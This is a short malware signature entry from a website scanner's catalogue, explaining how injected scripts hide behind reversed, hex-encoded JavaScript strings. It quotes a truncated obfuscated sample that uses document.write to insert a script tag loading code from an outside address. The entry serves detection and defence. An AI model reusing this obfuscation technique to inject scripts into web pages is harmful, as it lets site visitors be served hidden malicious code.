SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware.hex_reverse_script

malware.hex_reverse_script

Description:
Suspicious code that uses the .split("").reverse().join("") trick to obfuscate injection of scripts into a web page.

Many malicious scripts add one more layer of obfuscation by applying common JavaScript Obfuscator where reversed script gets hex-encoded. For example:

var _0xaae8=["","x6Ax6F​x69x6E","x72x65x76​x65x72x73x65","x73x70x6Cx69x74","x3Ex74x70x69​x72x63x73x2Fx3Cx3E​x22x73x6Ax2Ex79​x72x65x75x71x6Ax2F​x38...skipped...x31x2Ex39x34x32​x2Ex34x33x31x2Fx2Fx3A​x70x74x74x68x22x3Dx63x72​x73x20x74x70x69​x72x63x73x3C","x77x72​x69x74x65"];document​[_​0xaae8[5]](_0xaae8[4][_​0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8​[0])​)

where "x3Dx63x72​x73x20x74x70x69x72​x63x73x3C" decodes to "=crs tpircs<" and then to "<script src=".

Affecting: Any web site (no specific target).